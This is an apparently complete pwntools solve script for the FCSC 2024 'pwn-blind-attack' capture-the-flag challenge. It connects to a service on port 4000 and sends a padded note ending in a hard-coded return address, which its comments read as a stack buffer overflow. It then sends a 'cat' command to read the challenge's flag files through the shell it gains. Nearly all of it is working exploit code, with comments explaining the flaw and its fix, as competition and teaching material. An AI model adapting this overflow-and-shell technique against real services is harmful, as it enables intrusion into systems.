Created
January 2, 2025 21:05
Challenge fcsc2024-pwn-blind-attack
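"""Solve script for the FCSC 2024 "pwn-blind-attack" challenge service.

Reads the target from the environment, connects to TCP port 4000, answers the
service's prompts, submits an oversized note and prints whatever the service
sends back before the connection closes.

Environment:
    TARGET_IP: address of the service instance (required).
    TARGET_EXTRA: JSON array of the flagids for the current service and team.
"""
import json
import os

from pwn import context, remote

# Log every byte sent and received; lower to INFO, WARNING or ERROR for less output.
context.log_level = "DEBUG"

# Load environment variables.
# EXTRA is an array of the flagids for current service and team; it is parsed
# here but not used further down.
HOST = os.getenv("TARGET_IP")
EXTRA = json.loads(os.getenv("TARGET_EXTRA", "[]"))

# Fail with a clear message instead of handing None to remote().
if not HOST:
    raise SystemExit("TARGET_IP is not set")

# Timeout is important to prevent stall.
r = remote(HOST, 4000, typ="tcp", timeout=2)
try:
    # Wait for the end of the banner, then answer the first prompt.
    r.recvuntil(b'e note summary.\n')
    r.sendline(b'n')
    r.recvuntil(b'vuVE8\nContent: \n')

    # The note content is printable filler followed by eight bytes that decode,
    # little-endian, to 0x4016e5.
    # NOTE(review): this looks like an unchecked-length read into a fixed-size
    # buffer, with the trailing bytes landing on a saved return address; confirm
    # against the service binary. On the service side the fix is to bound the
    # read to the buffer size; stack canaries and a position-independent build
    # would additionally make a hard-coded address like this one unreliable.
    r.sendline(b'PjiFs69P7liiKPaKS73Ym9IyPSAhw21Nd2xCCfbQSMboGcFfkYMjmY99ScBS2yjmZySDQDin64MwLI9ZhPqd1a5UZ3jpXXzv553SSHnQ7bDzLeBD5VRNMswiv36fHMu1RxkUMIRkpCqkTU2IQjZcSgF5SXOek0ifAGDXtyl1UUB34CPAqPbTq7eAtGVCoIChiYPoJJrW1JR5s6QNZWVKT7Jf5KbchBjIJjUMmbG6\xe5\x16@\x00\x00\x00\x00\x00')

    # Presumably run by a shell on the far end once the note has been
    # processed; it reads the files in the challenge's flag directory.
    r.sendline(b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*')

    # Alternative that stops at a known tail instead of waiting for the close:
    # data = r.recvuntil(b'ca8f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n')
    # Capture all remaining bytes until the peer closes or 5 seconds pass.
    data = r.recvall(timeout=5)
    print(data)
finally:
    # Release the socket even when a receive raises (for example on early EOF).
    r.close()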